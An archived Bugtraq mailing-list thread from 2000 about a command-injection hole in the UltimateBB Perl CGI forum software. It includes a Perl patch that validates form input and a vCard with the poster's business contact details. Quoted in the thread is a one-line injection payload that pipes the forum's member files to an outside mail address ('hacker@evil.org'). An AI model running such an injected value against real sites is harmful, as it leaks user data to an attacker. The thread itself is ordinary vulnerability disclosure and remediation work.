[13933] in bugtraq
Re: perl-cgi hole in UltimateBB by Infopop Corp.
daemon@ATHENA.MIT.EDU (Irwin Lazar)
Fri Feb 18 20:45:27 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01BF7952.B555EE10"
Message-Id: <0C875DC28791D21192CD00104B95BFE755731C@BGSLC02>
Date: Thu, 17 Feb 2000 07:24:30 -0700
Reply-To: Irwin Lazar <ILazar@TBG.COM>
From: Irwin Lazar <ILazar@TBG.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_000_01BF7952.B555EE10
Content-Type: text/plain;
charset="windows-1252"
according to the folks at UBB, the latest version 5.43d, fixes this
vulnerability. Has anyone been able to verify if this is in fact correct?
Irwin
> -----Original Message-----
> From: Jordan Ritter [mailto:jpr5@BOS.BINDVIEW.COM]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|
> # (note the ../ on the Members. You have to go up a
> directory to get the
> # file. Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty. unescape() borrowed from the far superior
> CGI.pm. It appears to work, but I haven't checked it for
> completeness.
> The ubb scripts are a programming disaster, and pass around
> metachars and
> filenames through form parameters, making input validation difficult.
> The patch below selectively validates input based on the name of the
> variable we're validating (i.e. only certain variables are dangerous;
> others are just dumb and not a risk). It's better to try and
> validate at
> the top leven then code review the source and try to patch
> every idiotic
> mistake that was made. At the very least, this stops the
> specific attack
> that was posted. There could be other holes that this
> doesn't cover, or
> alternative ways to carry out the same attack. Hopefully
> Infopop will get
> their act together soon.
>
> I can't believe they distribute this crap as commercial software.
> Actually, what I can't believe is how many people paid for
> it. God help
> us all.
>
>
> --jordan
>
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> < shift() if ref($_[0]);
> < my $todecode = shift;
> < return undef unless defined($todecode);
> < $todecode =~ tr/+/ /; # pluses become spaces
> < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> < return $todecode;
> < }
> <
> 1047a1038
> >
> 1112,1120d1102
> < # clean input
> < if ($key =~ /^(forum|topic|number|replynum)$/i) {
> < my($newval) = &unescape($val);
> <
> < if ($newval !~ /^([ -\@\w.]+)$/) {
> < $val = "bad_input";
> < }
> < }
> <
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> < my($name,$value) = split ("=", $row);
> <
> < if ($name =~ /^(forum|topic|number|replynum)$/i) {
> < my($newvalue) = &unescape($value);
> <
> < if ($newvalue !~ /^([ -\@\w.]+)$/) {
> < $value = "bad_input";
> < }
> <
> < push @out, "$name=$value";
> < } else {
> < push @out, $row;
> < }
> < }
> < @in = @out;
>
------_=_NextPart_000_01BF7952.B555EE10
Content-Type: application/octet-stream;
name="Irwin Lazar (E-mail).vcf"
Content-Disposition: attachment;
filename="Irwin Lazar (E-mail).vcf"
BEGIN:VCARD
VERSION:2.1
N:Lazar;Irwin
FN:Irwin Lazar (E-mail)
ORG:The Burton Group (Formerly NetReference, Inc.)
TITLE:Senior Consultant
TEL;WORK;VOICE:(703) 742-9659
TEL;WORK;FAX:(703) 742-8038
ADR;WORK:;;45615 Willow Pond Plaza;Sterling;Va;20164;USA
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:45615 Willow Pond Plaza=0D=0ASterling, Va 20164=0D=0AUSA
EMAIL;PREF;INTERNET:ilazar@tbg.com
REV:20000112T150132Z
END:VCARD
------_=_NextPart_000_01BF7952.B555EE10--
